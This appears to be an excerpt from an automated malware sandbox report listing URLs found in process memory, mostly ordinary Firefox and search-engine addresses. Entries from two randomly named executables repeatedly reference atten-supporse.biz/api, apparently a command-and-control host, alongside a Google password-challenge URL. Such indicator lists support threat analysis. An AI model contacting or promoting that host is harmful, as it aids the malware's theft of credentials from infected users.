                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul(
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulR
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/toolba
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulextensions.formautofill.addresses.ignor
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://activity-stream/lib/ToolbarP
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ContextualIdenti
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/LightweightTheme
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/PolicySearchEngi
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434823097.00000214AF403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434823097.00000214AF403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com
                          Source: firefox.exe, 0000001D.00000002.3443577003.00000214B3C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3341237846.00000214B3C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3329574781.00000214B3C77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com/
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260407550.00000214AB431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3404418065.00000214AB6B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260074424.00000214AB40F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/get
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 0000001D.00000002.3421733253.00000214ADB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.ca
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.ca_parseURL:
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 0000001D.00000002.3438362474.00000214AF718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.comK
                          Source: firefox.exe, 0000001D.00000002.3370890446.0000006AF5BD8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://accounts.go
                          Source: firefox.exe, 0000001D.00000002.3370890446.0000006AF5BD8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://accounts.go.comH
                          Source: firefox.exe, 0000001D.00000002.3377707348.000002149B511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 0000001D.00000002.3377330993.000002149B219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A9337000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org($
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpihttps://addo
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpiTry
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed(browserSetting
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushedThis
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.orgADD_EXTENSION_BUTTON_STAFF_3defaults_and_os_integration
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.orgpictureinpicture.settingsaccount-connection-disconnectedgeckoprofiler
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                          Source: firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                          Source: firefox.exe, 0000001D.00000003.3364445219.00000214ADDB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com/
                          Source: 176986cc9c.exe, 0000000D.00000003.3218675497.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164239132.00000000012C5000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3137799586.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106209007.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3339750999.00000000053D8000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3271110389.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3342488948.00000000053D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                          Source: 176986cc9c.exe, 0000000F.00000003.3365494500.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/6)
                          Source: 176986cc9c.exe, 0000000D.00000003.3274382491.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164373782.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3167441196.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3235293503.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3130526424.00000000057B0000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190538036.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3273337235.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3131338677.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164057533.00000000057B0000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3272216743.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3274066279.00000000012CB000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3189746475.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190825384.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106209007.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3245722384.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3271110389.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3271234904.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
                          Source: 176986cc9c.exe, 0000000D.00000003.3130526424.00000000057B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api9a
                          Source: 176986cc9c.exe, 0000000D.00000003.3164373782.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3167441196.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164057533.00000000057B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiF
                          Source: 176986cc9c.exe, 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164239132.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiI
                          Source: 176986cc9c.exe, 0000000D.00000003.3235293503.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3272216743.00000000012E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiR
                          Source: 176986cc9c.exe, 0000000F.00000003.3271110389.00000000053DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiU.
                          Source: 176986cc9c.exe, 0000000D.00000003.3235485658.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiV
                          Source: 176986cc9c.exe, 0000000D.00000003.3137799586.00000000012C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apif
                          Source: 176986cc9c.exe, 0000000D.00000003.3197921283.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190538036.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190825384.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/d
                          Source: 176986cc9c.exe, 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164239132.00000000012C5000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3137799586.00000000012C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/k
                          Source: 176986cc9c.exe, 0000000D.00000003.3131338677.00000000012CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/r
                          Source: 176986cc9c.exe, 0000000D.00000003.3274382491.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3218627779.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3235485658.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190538036.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3273337235.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3274066279.00000000012CB000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190825384.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api
                          Source: 176986cc9c.exe, 0000000D.00000003.3164239132.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/apiJ
                          Source: firefox.exe, 0000001D.00000002.3434716941.00000214AF3ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3430616593.00000214AF003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.3434716941.00000214AF3ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3377707348.000002149B511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://baidu.com
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://basket.mozilla.org/news/subscribe/
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://basket.mozilla.org/news/subscribe_sms/
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://basket.mozilla.org/subscribe.json
                          Source: d0d9725343.exe, 0000000B.00000003.2954843616.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3168094376.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3380329645.00000214A6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: d0d9725343.exe, 0000000B.00000003.3004420814.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2979921174.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3168094376.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3380329645.00000214A6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: firefox.exe, 0000001D.00000002.3420072274.00000214AD868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075resource://activity-stream/common/Actions.sys.mj
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464experimental-features-devtools-compatibility-pan
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439devtools.debugger.features.windowless-service-wo
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739mr2022-onboarding-set-default-primary-button-lab
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260691285.00000214AB452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260407550.00000214AB431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3404418065.00000214AB6B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260074424.00000214AB40F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: firefox.exe, 0000001D.00000002.3412078877.00000214AC4D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
                          Source: d0d9725343.exe, 0000000B.00000003.2954843616.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3168094376.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3380329645.00000214A6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
